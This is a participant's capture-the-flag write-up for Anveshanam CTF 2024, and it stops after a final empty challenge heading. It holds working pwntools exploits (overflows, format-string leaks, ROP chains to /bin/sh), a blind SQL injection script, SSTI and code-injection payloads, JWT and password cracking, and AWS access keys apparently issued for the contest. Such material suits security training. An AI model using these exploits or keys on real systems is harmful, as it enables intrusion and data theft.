Anveshanam CTF 2024 Writeup
Description
From June 21st 2024 to June 23rd 2024 i have participated in an exhilarating 48-hour Capture The Flag (CTF) event organized by IIT Jammu in collaboration with DRDO. This highly competitive event brought together some of the brightest minds in cybersecurity from across India.
After an intense and demanding 48 hours, I am thrilled to share that I secured 4th place in the competition, a significant achievement considering the high level of participation and the difficulty of the challenges. This experience not only tested my skills but also provided an invaluable opportunity to learn and grow in the field of cybersecurity.
Web/Easy_One
GET / HTTP/1.1
Host: 91c1bd6a-e189-42d1-a5ac-5979555845c6.anveshanam.net:8001
Cache-Control: max-age=0
X-Forwarded-For: 192.168.35.4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
POST /puzzle HTTP/1.1
Host: 91c1bd6a-e189-42d1-a5ac-5979555845c6.anveshanam.net:8001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJjYW5fc29sdmVfcHV6emxlIjp0cnVlfQ.ZnUi6w.yhMnudQkT6o5WrEcu0014I4bb5g
Connection: close
Content-Length: 33
solution=open('flag.txt').read()#
Cloud/bucket_breach
aws S3 ls --profile bucket_breach
aws S3 cp s3://<bucket_name>/flag.html . --profile bucket_breach
open the flag.html you will get the flag
Steg/convert_it
After unzipping the file we can see there are many file and luckily in first turn i did ls -la so i can spot that there is one file which has different size running it i got some string
b3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d0123456789876543210c8d12ab3f6d745c8d126f4a82d7b9e0fac3f1e8465b72d901a0e5876c3d249b0fc7e83f0c1dea925478a2c3f50d71e94b6d4e03ac25fab1c9c05b67d80a3f6e9241f3a0dcb7e905d58b6a029eddf80b3694e071c583efab08f62d4a03ef156b17d92548c5b768e92d3e0749b36fe70958c5b7c6e2d901a3e87459c6d3c249b3aab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab3f6d745c8d12ab5c
now i was struck and read the description it says What is palindrome?
now i guessed we have to find palindrome in this big string and i found one 0123456789876543210
using it as password to testdata.zip got the task.txt file which has the flag
flag{acde070d-8c4c-4f0d-9d8a-162843c10333}
Steg/jack_is_waiting
in this challenge we have to cracking password of a zipfile
zip2john JACK.zip > JACK.passwordhash
john JACK.passwordhash --wordlist=/usr/share/wordlists/rockyou.txt
JUMPINGJACK is the password unzip JACK.zip gives JACK.txt if we cat it out we will get
flag{b77faf6d-b4c5-4a61-b45f-691c769498c3}
Forensics/recycleBF
Description:
The password of the file "flag.txt.rar" is the time at which it is deleted! Format: "YYYY-MM-DD HH:MM:SS". Good luck!
from this writeup
Cyber talents (Search in Trash) write-up | by amer dandis | Medium
found a tool rifiuti2 and i used it to analyze the INFO file
Recycle bin path: 'INFO2'
Version: 5
OS Guess: Windows XP or 2003
Time zone: Coordinated Universal Time (UTC) [+0000]
Index Deleted Time Gone? Size Path
1 2018-11-04 02:43:31 Yes 4096 C:\Documents and Settings\Bob\Desktop\flag.rtf
1 2018-11-04 17:13:42 Yes 4976640 C:\Documents and Settings\Bob\Desktop\CFF_Explorer
2 2018-11-04 17:13:42 Yes 14917632 C:\Documents and Settings\Bob\Desktop\DIE_1.01_win
3 2018-11-04 17:13:42 Yes 421888 C:\Documents and Settings\Bob\Desktop\PEiD-0.95-20081103
4 2018-11-04 17:13:42 Yes 102400 C:\Documents and Settings\Bob\Desktop\PEview
1 2018-11-11 03:36:45 Yes 24576 C:\Documents and Settings\Bob\Desktop\sample_gui.exe
2 2018-11-11 03:39:53 Yes 32768 C:\WINDOWS\system32\sethc.exe
3 2018-11-11 03:44:55 Yes 32768 C:\WINDOWS\system32\sethc.exe.(1).bak
4 2018-11-11 03:48:57 Yes 32768 C:\WINDOWS\system32\sethc.exe
5 2018-11-11 04:04:03 Yes 32768 C:\WINDOWS\system32\sethc.exe.(1).bak
6 2018-11-13 04:28:58 Yes 0 C:\Documents and Settings\Bob\Desktop\New Folder
7 2018-11-13 04:30:51 Yes 0 C:\Documents and Settings\Bob\Desktop\New Text Document.txt
we know now the password is 2018-11-04 02:43:31
Now opening the flag.txt.rar with the password file we can see the flag
flag{11e24553-b0c5-4b96-a0d8-cd7e020a6841}
Rev/Déjà vu
patch the given user.out to change instruction to jne to je then if u run it if we enter wrong password we will get
86ac8b0d-febb-4b16-8ef8-40a09a0f1a9e
flag{86ac8b0d-febb-4b16-8ef8-40a09a0f1a9e}
Web/eternity
There was a cookie which is set to 0 and if we go to some route it was showing the time so i increased the time to a big value and got the flag
Forensics/precious_history
download the big file unzip it grep for flag and you will get it
Rev/shresth_naag
opening it in ida i can see a message box
MGJLPO\x1CM\x18\x1D\x19\x1D\x1B\x06\x1CMIO\x06\x1F\x1DMN\x06I\x19\x1F\x19\x06H\x1C\x19\x1EM\x1C\x13\x1B\x1EO\x1B\x1EV
flag = "MGJLPO\x1CM\x18\x1D\x19\x1D\x1B\x06\x1CMIO\x06\x1F\x1DMN\x06I\x19\x1F\x19\x06H\x1C\x19\x1EM\x1C\x13\x1B\x1EO\x1B\x1EV"
for char in flag:
print(chr(ord(char)^43), end="")
flag{d7f36260-7fbd-46fe-b242-c725f7805d05}
Cloud/Minute-mystery
docker run cyberseciitjammu/minute-mystery:lts
docker container exec -it 1c0a52fa8f1b /bin/sh
cd docker-entrypoint-initdb.d
cat init.sql
CREATE TABLE pool (id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(50) NOT NULL, email VARCHAR(100) NOT NULL);
CREATE TABLE zapper (id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(50) NOT NULL, email VARCHAR(100) NOT NULL);
CREATE TABLE splash (id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(50) NOT NULL, email VARCHAR(100) NOT NULL);
CREATE TABLE boldfit (id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(50) NOT NULL, email VARCHAR(100) NOT NULL);
CREATE TABLE time (id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(50) NOT NULL, email VARCHAR(900) NOT NULL);
INSERT INTO time (username, email) VALUES ('user0', 'user1@example.com');
INSERT INTO time (username, email) VALUES ('user1', 'user1@example.com');
INSERT INTO time (username, email) VALUES ('haha_here_i_am', '666c61677b32626631636438362d613436632d343461662d613538302d3664396463313166353131327d');
INSERT INTO time (username, email) VALUES ('user2', 'user1@example.com');
INSERT INTO time (username, email) VALUES ('user3', 'user1@example.com');
INSERT INTO time (username, email) VALUES ('user4', 'user1@example.com');
INSERT INTO time (username, email) VALUES ('user5', 'user1@example.com');
convert from hex
666c61677b32626631636438362d613436632d343461662d613538302d3664396463313166353131327
flag{2bf1cd86-a46c-44af-a580-6d9dc11f5112}
Web/moviegores
It was a react app checking the source in the inspect reveals some details about routes there was a route which is loading a flag component it says we need to be admin this website had login too so i registered and logged in as a test user after decoding the JWT we can see it had username in it. i tried none attack it didn’t work so the only option is to crack the jwt key using jwt-crack
jwt-cracker -t <token> -d /usr/share/wordlists/rockyou.txt
after running for a while it gave the password as ilovemovies putting it in jwt.io in the secret key i was able to forge the token of administrator and got the flag
Web/repocrypt
git-dumper http://<URL.git ~/website
const encrypt = (data, password) => {
const algorithm = "aes-192-cbc";
const key = crypto.scryptSync(password, "salt", 24);
const cipher = crypto.createCipher(algorithm, key);
let encryptedData = cipher.update(data, "utf-8", "hex");
encryptedData += cipher.final("hex");
return encryptedData;
};
const decrypt = (encryptedData, password) => {
const algorithm = "aes-192-cbc";
const key = crypto.scryptSync(password, "salt", 24);
const decipher = crypto.createDecipher(algorithm, key);
let decryptedData = decipher.update(encryptedData, "hex", "utf-8");
decryptedData += decipher.final("utf-8");
return decryptedData;
};
const password = "E@g3rlyW8ingKaliki2898AD!";
by running
console.log(decrypt("434f579fb5ff9db447a1b87d123105e5ff3f6c53b731a7add9b281203bf62342f7d7150cd273dcfaa2c32aebcd6c865e", password));
Got the flag
PWN/captain_chopper
followed the video below Linux Privilege Escalation: Sudo + LD_PRELOAD - YouTube
Cloud/Credential_Conundrum
aws s3 ls --profile credential_conundrum
has some files
#Username ! #Password
IITJ - iitjammu
Flag2024 - accesskey"
AWS - anveshana@2023
Flag, - Flag123
fLaG - FlAg@24
iitjammu - awsquestion2
CTF - CTF@2024
IIT@cyber - IITJammu@ctf
link : ec2-13-127-22-143.ap-south-1.compute.amazonaws.com
```text
got other access key from the link above
```text
accessKey : AKIAU6GDXBTEKXZDOWXR
secretkey : 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
aws lambda get-function --function-name Credential_Conundrum --profile ccpart2 --region apsouth-1
will give some json data check tags and u can see the flag
Cloud/no_sudo
download and Unzip the file you will see a vdi file now grep for the following
grep -r -E 'flag[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' --text 2>/dev/null
REV/rebelstar
from pwn import *
elf = ELF("./rebelstar")
connection = remote("415-0967b7fd-1738-43c3-b844-73a531cf0be6.anveshanam.net", "10007")
# connection = elf.process()
connection.recvuntil("crore? ")
payload=b'kalki2898AD'+b"\x00"*(64-11)+b"A"*12+b"\x64"+b"\x00"*3+b"\x32"+b"\x00"*3+b"\xc8"+b"\x00"*3+b"\xfa"+b"\x00"*3+b"\x64"+b"\x00"*4 + b"\x64"
connection.sendline(payload)
connection.interactive()
this will give the flag
WEB/easy-web
Going to cookies modifying the base64 encoded value to hard-web i got the flag
Web/express_evasion
curl http://url/getfile?file=asda&file=dv&file=asd&file=../&file=flag.txt&file=.&file=js
app.get("/getFile", (req, res) => {
let { file } = req.query;
}
because of this like the file is being converted as an array
PWN/stealit
from pwn import *
proc=ELF('./stealit')
ret=0x000000000040101a
payload=b'A'*0x28+ p64(ret)+p64(proc.symbols.steal)
#connection = proc.process()
connection = remote("415-fa25d138-b28e-4fc4-a12c-0403211e92b5.anveshanam.net", 10152)
connection.recv(1024)
connection.sendline(payload)
connection.interactive()
stdbuf -o0 -i0 python3 stealit.py
Web/anime_voting
Really good SQL injection challenge
import requests
url = "http://307bcef2-81c3-495c-9768-eec437074f9f.anveshanam.net:8001"
chars = "abcdefghijklmnopqrstuvwxyz0123456789"
correct = ""
stop = False
while not stop:
for injection in chars:
payload_url = f"{url}/anime?order=%28SELECT%20%28CASE%20WHEN%20EXISTS%28SELECT%20name%20FROM%20sqlite_master%20WHERE%20name%20LIKE%20%27flag{correct}{injection}%25%27%29%20THEN%20votes%20ELSE%20id%20END%29%29"
print(f"flag{correct}{injection}")
response = requests.get(payload_url)
result = response.json()
if result[0]["id"] != 1:
correct += injection
if len(correct) == 5:
print(f"Found DB_name: flag{correct}")
stop = True
break
flag_db = "flag"+correct
chars = "abcdef0123456789-}"
correct = ""
stop = False
flag = "flag{"
while not stop:
for injection in chars:
payload_url = f"{url}/anime?order=%28SELECT%20%28CASE%20WHEN%20EXISTS%28SELECT%20flag%20FROM%20{flag_db}%20WHERE%20flag%20LIKE%20%27flag%7B{correct}{injection}%25%27%29%20THEN%20votes%20ELSE%20id%20END%29%29"
print(flag+injection)
response = requests.get(payload_url)
result = response.json()
if result[0]["id"] != 1:
correct += injection
flag += injection
if injection == "}":
print(f"Found Flag: {flag}")
stop = True
break
continue
this script gives real hacking feet.
Cloud/Version_Vortex
Access key ID: AKIASQUTIFWBI5UZN5UF
Secret access key: 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
configure aws with profile name as version_chall
aws describe-db-clusters --profile version_chall
has some access keys when i check its iam role it has access
aws iam get-policy-version --policy-arn arn:aws:iam::173181250946:policy/ctfcyberiitjamu --version-id v9 --profile version_chall
we can see a link
https://jshdegfsgkdgks.s3.amazonaws.com/index.html
we will get some hex encoded string and
666C61677B36366663323432612D303837382D363765642D61383333203032623537393131646264367
flag{66fc242a-0878-67ed-a833 02b57911dbd6}
Cloud/sandwich
docker pull cyberseciitjammu/sandwich
sudo docker save 47f41629f1cf > sandwich.tar
untar it and find file types of the files inside they are also tar untar them until you will find the flag
data.txt has e973971d-cf44-4b7c-95ae-251c0d3017ee
flag is flag{e973971d-cf44-4b7c-95ae-251c0d3017ee}
Web/rapid_rush
in this challenge we have to exploit race condition when redeeming the coupon i made a go script to do that
package main
import (
"fmt"
"io/ioutil"
"net/http"
"sync"
)
func fetchURL(url string, wg *sync.WaitGroup, results chan<- string) {
defer wg.Done()
resp, err := http.Get(url)
if err != nil {
results <- fmt.Sprintf("Error fetching %s: %v", url, err)
return
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
results <- fmt.Sprintf("Error reading response from %s: %v", url, err)
return
}
results <- fmt.Sprintf("Response from %s: %s", url, string(body))
}
func main() {
url := "http://b3dc89e7-b579-4445-ac7a-5ebdf8115380.anveshanam.net:8001/api.php?card=aaaaaaaaaaaaaaae"
var wg sync.WaitGroup
results := make(chan string, 100)
for i:=0; i<=100; i++ {
wg.Add(1)
go fetchURL(url, &wg, results)
}
wg.Wait()
close(results)
for result := range results {
fmt.Println(result)
}
}
after compiling it to
go build main.go
./main
go to website and redeem your remaining tokens to get the flag
Steg/Decode WhatUC
Attachment has a image img.jpeg
ExifTool Version Number : 12.57
File Name : img.jpeg
Directory : .
File Size : 16 kB
File Modification Date/Time : 2024:06:05 18:45:38+05:30
File Access Date/Time : 2024:06:26 02:04:45+05:30
File Inode Change Date/Time : 2024:06:26 02:04:42+05:30
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : 01100010011010010111010001100011011011110110100101101110
Image Width : 275
Image Height : 183
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 275x183
Megapixels : 0.050
i tried the binary data as hex, octal, ascii no luck i tried it as it is as steghide password it works
steghide extract -sf img.jpeg
reyaetr
vgjxf
sryhERWHY
312
fgnhxf
dhztd
\324534
4w55\
5462\
hjlvgl
gchjy
\fgtrrt
\udkmc
9419
9263791
123t712
nds.gv b,mc fxew
3rgd b
94192
fkzbnlk
aHR0cHM6Ly9naXRodWIuY29tL1JpMTl2L2ZsYWc=
238y2305
jasbc,m
94191
dzjkbvgd
sdh'
163
975014
8560-2
m,vxc
83250m
x,cjvbl23905
aHR0cHM6Ly9naXRodWIuY29tL1JpMTl2L2ZsYWc= ==> https://github.com/Ri19v/flag
decoding this 64333732363339382d643130662d343561662d623130312d313561373939303863326135
from hex gave the flag flag{d3726398-d10f-45af-b101-15a79908c2a5}
Steg/Secrets of the Enchanted Forest
this is a basic challenge so i went for stegseek and it bruteforced the flag and got the flag
Happy hunting and good luck you discovered the "Secrets of the Enchanted Forest"!
flag{1a95422a-11b2-499a-93d4-1e8ab3f43b32}
PWN/ipl_survey
from pwn import *
def sla(x,y):
r.recvuntil(x)
r.sendline(y)
elf = ELF('./ipl')
# r = elf.process()
r = remote("415-c6435d77-3a2b-4971-b862-bfc99cabe4ab.anveshanam.net", 10463)
payload="%3$p %15$p"
sla(":",payload)
leak=r.recvuntil("Second").split()
canary=int(leak[1].decode(),16)
libc_leak=int(leak[0].decode(),16)
rdi=0x4013b3
ret=0x40101a
payload1=b'A'*72 + p64(canary) + p64(ret)+ p64(elf.symbols.win)
sla(":",payload1)
r.interactive()
python3 ipl.py
Cloud/lanscape
download the image and unzip it run grep on the .vdi image then you will get the flag
Steg/Try To undersTand the ascii image
Took a lot of time to figure it out this challenge
746865 5F666C 61675F 746865 5F666C 616721 decode this from hex gives the_flag_the_flag!
steghide can’t work with png so using openstego after extracting the data found a secret.txt.gpg file now we have to find password of the GPG tried multiple thing at once like running john, hashcat so i made a script to generate wordlist from the given words
import itertools
import subprocess
encrypted_file_path = "./secret1.txt.gpg"
with open(encrypted_file_path, 'rb') as encrypted_file:
encrypted_data = encrypted_file.read()
def decrypt_gpg_file( passphrase):
try:
subprocess.check_output(f'gpg --pinentry-mode=loopback --passphrase "{passphrase}" -o data{passphrase}.txt -d secret1.txt.gpg', shell=True)
except subprocess.CalledProcessError:
return False
return True
def generate_combinations(input_string, n):
cleaned_string = ''.join(input_string.replace(" ", ""))
combinations = set([''.join(p) for p in itertools.combinations(cleaned_string, n)])
return combinations
input_string = "Try To undersTand the ascii image"
combinations = generate_combinations(input_string, 3)
print(f"Trying {len(combinations)} passwords")
for perm in combinations:
if decrypt_gpg_file(perm):
print(f"Password found {perm}")
break
password was TTT
flag{c24aed12-66d7-47d4-a0c5-2e1c6bdfa810}
PWN/largest-veint
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 1
You explore deeper into the cave and find: 8
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2
You explore deeper into the cave and find: 15
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 3
You explore deeper into the cave and find: 22
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 4
You explore deeper into the cave and find: 29
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit):
we can see 1->8, 2->15, 3->22
so input*7+1
now what can we do. i guessed from the title if i give largest negative value then i can get the flag normally we can’t give -1 so we have to use integer overflow in c which will give me the flag so it can handle big integers so not normal int variable is being used my guess is either long int or long long int so i started with approximate (2**64)/7
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2635249153387078700
You explore deeper into the cave and find: -715
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2635249153387078000
You explore deeper into the cave and find: -5615
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2635249153387078701
You explore deeper into the cave and find: -708
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2635249153387078800
You explore deeper into the cave and find: -15
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2635249153387078801
You explore deeper into the cave and find: -8
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2635249153387078810
You explore deeper into the cave and find: 55
You stumble upon a dark cave. Enter the charm to explore deeper (or -1 to exit): 2635249153387078802
You explore deeper into the cave and find: -1
The flag is: flag{bfa362d7-1bc3-466e-94c2-895a9b608d56}
PWN/supremeyaskin
from pwn import *
exe = ELF("supremeyaskin")
context.binary = exe
# elf = exe.process()
elf = remote('anveshanam.net', 10113)
ropper = ROP(exe)
ropper.rax = 0
ropper.rdi = 0
ropper.rsi = 0x404500
ropper.rdx = 8
ropper.raw(0x401141)
ropper.rax = 59
ropper.rdi = 0x404500
ropper.rsi = 0
ropper.rdx = 0
ropper.raw(0x401141)
elf.sendafter(b'-' , b'a'*8+ropper.chain()+b'\x00'*(0x12c-len(ropper.chain())-8))
elf.send(b'/bin/sh\x00')
elf.interactive()
python3 asdasdasdas.py
Forensics/Code Puzzle Lock
BTW: Tones.wav file has a really good music
stegseek Tones.wav
got the hidden file from the Tones.wav which is Tones.wav.out it is just a python script
import base64
def reveal_flag():
encoded_flag = b'ZmxhZ3s0NGQ1M2RiYS1mNGRjLTRlNTMtYjFkNS0wMmFmOTI5MjM5N30='
return base64.b64decode(encoded_flag).decode('utf-8')
def main():
print("You Got the Flag!!!")
#print(reveal_flag())
if __name__ == "__main__":
main()
decoding base64 string we will get the flag
flag{44d53dba-f4dc-4e53-b1d5-02af9292397}
Web/newdevblog
simple ssti put this below one in Search and get the flag
{{url_for.__globals__.os.popen('cat flag.txt').read()}}
Rev/antariksh
Open the bynary in ida in sub_4015BB() there is a string
1;60,dbfbfoaozg366zcbcaznagbz`o1c6nonnae1*
if we put this in xor brute force we will get the flag
XOR Brute Force - CyberChef
flag{35151868-0daa-4546-9605-78f4a989962f}
PWN/classic
This was challengeing
we have to find the version of libc by leaking the address of printf, gets, puts and i have used libc-database
and found that version is libc6_2.31-0ubuntu9.10_amd64.so
now using pwninit --libc libc6_2.31-0ubuntu9.10_amd64.so --bin check
i have patched the file to run
#!/usr/bin/env python3
from pwn import *
exe = ELF("./check")
exe = ELF("./check_patched")
context.binary = exe
# connection = remote('anveshanam.net', 10185)
connection = exe.process()
connection.sendlineafter(b'- ', b'%23$p %25$p %29$p')
canary, libc_address, exe.address = map(lambda s : int(s, 16), connection.recvline().decode().split())
exe.address -= 0x11a9
libc_address -= 0x24083
print(hex(canary), hex(libc_address), hex(exe.address))
rop_chain = ROP(exe)
rop_chain.rdi = libc_address+0x1b45bd
rop_chain.rsi = 0
rop_chain.raw(libc_address+0x52290)
connection.sendlineafter(b'- ', b'a'*136+p64(canary)+b'a'*8+rop_chain.chain())
connection.interactive()
stdbuf -o0 -i0 python3 classic.py
Steg/Mr. Bot
given challenge
https://richavij12.s3.us-east-2.amazonaws.com/richavijskdjvbks/New+folder/find.html
change the endpoint to flag.html then if you go to that URL then then we can see other URL upon opening it we can see some login page see source of the page and you can see it is pointing to a page just go to that page and get the flag
Rev/rezzz
from z3 import *
solver = Solver()
param_1 = [Int(f'param_1_{i}') for i in range(50)]
solver.add((param_1[0x1a] + param_1[0x20] + param_1[1] + param_1[0x29]) == 0x183)
solver.add((param_1[2] + param_1[10] + param_1[0xb] + param_1[0] + param_1[0x17] + param_1[0x1b]) == 0x1ca)
solver.add((param_1[0x13] + param_1[0x17] + param_1[3] + param_1[0x14] + param_1[0x1f] + param_1[0xd] +
param_1[10] + param_1[0x21] + param_1[0x24] + param_1[0x23] + param_1[6] + param_1[9] +
param_1[0x1e] + param_1[0x16] + param_1[7] + param_1[0x18] + param_1[0x27] + param_1[0x22]) == 0x51a)
solver.add((param_1[0x13] + param_1[0x27] + param_1[0xd] + param_1[0x11]) == 0xcb)
solver.add((param_1[0x1f] + param_1[0x1b] + param_1[4] + param_1[0x29] + param_1[8] + param_1[0x17]) == 500)
solver.add((param_1[4] + param_1[0x1d] + param_1[0x22] + param_1[0x1e]) == 0x170)
solver.add((param_1[0x25] + param_1[0x24] + param_1[0x23] + param_1[0x29] + param_1[0xf] + param_1[0x15] +
param_1[0x28] + param_1[0x1c] + param_1[0x1a] + param_1[0x21]) == 0x2fe)
solver.add((param_1[0x15] + param_1[6] + param_1[10] + param_1[0xb] + param_1[0xf] + param_1[9] + param_1[0x1b]
+ param_1[3] + param_1[0x1b] + param_1[2] + param_1[0x26]) == 0x33d)
solver.add((param_1[0x1e] + param_1[0x1e] + param_1[0x23] + param_1[0x27] + param_1[0x19] + param_1[0] + param_1[0x29] +
param_1[0x16] + param_1[0x17] + param_1[2] + param_1[0] + param_1[0xb] + param_1[0x21] + param_1[0xc] + param_1[2] +
param_1[0x28] + param_1[0x15] + param_1[0x1c] + param_1[1] + param_1[0x16]) == 0x65f)
solver.add((param_1[0xb] + param_1[0x1e] + param_1[0x17] + param_1[0x21] + param_1[0x24] +
param_1[0xc] + param_1[0] + param_1[0x23] + param_1[0] + param_1[3] + param_1[0xb] +
param_1[0x21] + param_1[8] + param_1[0x22] + param_1[0xf] + param_1[0x1f] + param_1[2]) == 0x57d)
solver.add((param_1[0x22] + param_1[0x21] + param_1[0x29] + param_1[8] + param_1[0x29] + param_1[5] + param_1[0x10]) == 0x289)
solver.add((param_1[0x1b] + param_1[0x24] + param_1[8] + param_1[3] + param_1[4] + param_1[0x1c] + param_1[0x23] +
param_1[0x23] + param_1[0x19] + param_1[0x15] + param_1[0x16] + param_1[0x28]) == 0x373)
solver.add((param_1[0x1d] + param_1[0x22] * 2 + param_1[0xe] + param_1[0x29] + param_1[0x1e] +
param_1[0x22] + param_1[0xc] + param_1[0xc] + param_1[0x20] + param_1[0x23] + param_1[0xc] +
param_1[1] + param_1[1] + param_1[0x1c] + param_1[0x10]) == 0x572)
solver.add((param_1[9] + param_1[0x14] + param_1[6] + param_1[1]) == 0x16c)
solver.add((param_1[0x1c] + param_1[9]) == 0x65)
solver.add((param_1[0x25] + param_1[10] + param_1[0x10] + param_1[0x20] + param_1[0x27] +
param_1[1] + param_1[0x27] + param_1[9] + param_1[0x29] +
param_1[0x16] + param_1[0xf] + param_1[0x29] + param_1[0xf] +
param_1[0x20] + param_1[0xb] + param_1[0x17] + param_1[0x21] +
param_1[0x25]) == 0x5f2)
solver.add((param_1[4] + param_1[0x17] + param_1[0x11] + param_1[0x15] + param_1[0x1b] +
param_1[2] + param_1[0x1d] + param_1[1] + param_1[0x1d] +
param_1[0x12] + param_1[0x10] + param_1[0xc] + param_1[0x11] +
param_1[0x24] + param_1[0x13]) == 0x3cb)
solver.add((param_1[10] + param_1[10] + param_1[0x25] + param_1[0xd]) == 0x156)
solver.add((param_1[8] + param_1[0xb] + param_1[0x29] + param_1[0x1d] + param_1[0x12] +
param_1[0xc] + param_1[0x29]) == 600)
solver.add((param_1[8] + param_1[0x21] + param_1[6] + param_1[0x14] + param_1[0x20] +
param_1[0x1d] + param_1[0x28] + param_1[0x16] + param_1[0x11] +
param_1[0x13] + param_1[0x24] + param_1[0x25] + param_1[0x1d] +
param_1[0] + param_1[0x16] + param_1[9] + param_1[0x1b]) == 0x4e7)
solver.add((param_1[0] + param_1[3] + param_1[0x20] + param_1[0xb] + param_1[4] +
param_1[0x1e]) == 0x247)
solver.add(param_1[0x1b] + param_1[0x21] + param_1[0x20] + param_1[0x1c] + param_1[0x25] +
param_1[0x29] + param_1[0x28] + param_1[0x15] == 0x2a0)
solver.add(param_1[0x15] + param_1[0x10] + param_1[0x1e] + param_1[0x27] == 0x100)
solver.add(param_1[0x23] + param_1[5] + param_1[0x20] + param_1[0x28] + param_1[0x10] == 0x162)
solver.add(param_1[0x1e] + param_1[8] + param_1[0xb] + param_1[0x1d] + param_1[0x1f] +
param_1[6] == 0x1c5)
solver.add(param_1[0x29] + param_1[0x24] == 0xad)
solver.add(param_1[10] + param_1[0x15] + param_1[0x14] + param_1[0xc] == 0x15d)
solver.add(param_1[5] + param_1[0x1c] == 0x5e)
solver.add(param_1[1] + param_1[0x18] + param_1[0x29] + param_1[4] + param_1[1] + param_1[2] +
param_1[0x18] + param_1[9] + param_1[0x1c] + param_1[0xd] + param_1[0x26] + param_1[0x21] +
param_1[0x1c] + param_1[0x26] + param_1[7] + param_1[0x19] + param_1[0] + param_1[9] +
param_1[0x1d] + param_1[0xc] == 0x64e)
solver.add(param_1[0x28] + param_1[9] + param_1[0x18] + param_1[0x10] + param_1[0xf] +
param_1[9] + param_1[0x22] + param_1[0xb] + param_1[0x23] +
param_1[0x21] + param_1[0x21] + param_1[2] + param_1[0x1a] +
param_1[0x11] + param_1[8] == 0x48c)
solver.add(param_1[2] + param_1[2] + param_1[0x12] + param_1[0x1b] + param_1[0x12] +
param_1[0x10] + param_1[0x29] + param_1[2] + param_1[0x24] +
param_1[2] + param_1[0x16] + param_1[0x16] == 0x35c)
solver.add(param_1[0xd] + param_1[0xe] + param_1[0xd] == 0x93)
solver.add(param_1[5] + param_1[0x1b] + param_1[0x18] + param_1[0x26] + param_1[0x27] +
param_1[0x28] + param_1[0x16] + param_1[0x28] == 0x232)
solver.add(param_1[0x1e] + param_1[0x1a] + param_1[9] + param_1[0x1c] + param_1[0x14] +
param_1[0xf] + param_1[0x12] + param_1[2] + param_1[0x1a] +
param_1[5] + param_1[0x1e] == 0x315)
solver.add(param_1[0x17] + param_1[0x20] + param_1[0x13] + param_1[0x15] + param_1[2] +
param_1[0x1c] + param_1[0x1b] + param_1[0x1b] + param_1[2] +
param_1[0x27] + param_1[0x13] + param_1[0x27] + param_1[0x10] +
param_1[2] + param_1[2] + param_1[0x18] + param_1[1] + param_1[0x1f] +
param_1[9] == 0x52d)
solver.add(param_1[0xc] + param_1[0x26] + param_1[10] + param_1[0x14] + param_1[0x28] +
param_1[0x1d] + param_1[0x26] + param_1[0x1a] + param_1[0x1a] +
param_1[0x1f] + param_1[0x25] + param_1[0x14] + param_1[0xe] +
param_1[10] + param_1[0x11] + param_1[0x26] + param_1[0x11] +
param_1[4] + param_1[0x20] + param_1[0x10] == 0x5d0)
solver.add(param_1[0x13] + param_1[0x19] + param_1[0xd] + param_1[0x23] + param_1[8] +
param_1[0x1e] + param_1[0x20] + param_1[0x26] + param_1[0x1e] +
param_1[0x23] + param_1[0x28] == 0x354)
solver.add(param_1[0xd] + param_1[0x25] + param_1[4] + param_1[0x27] + param_1[0xe] +
param_1[0x1d] + param_1[0x13] + param_1[0x1d] == 0x20f)
solver.add(param_1[0x1b] + param_1[0x10] + param_1[9] + param_1[0x20] + param_1[0xe] +
param_1[7] + param_1[0xc] == 0x1dd)
solver.add(param_1[6] + param_1[9] == 0x9d)
solver.add(param_1[0x22] + param_1[0xb] + param_1[0xe] == 0xd6)
solver.add(param_1[0x29] + param_1[0x16] + param_1[0x26] + param_1[0x1e] + param_1[0x27] == 0x17e)
if solver.check() == sat:
model = solver.model()
solution = [model[param_1[i]]for i in range(50)]
for char in solution:
try:
if chr((char.as_long())) != "}":
print(chr((char.as_long())), end="")
except :
pass
print("RIZZ}")
else:
print("No solution found")
Cloud/beyond_barrier
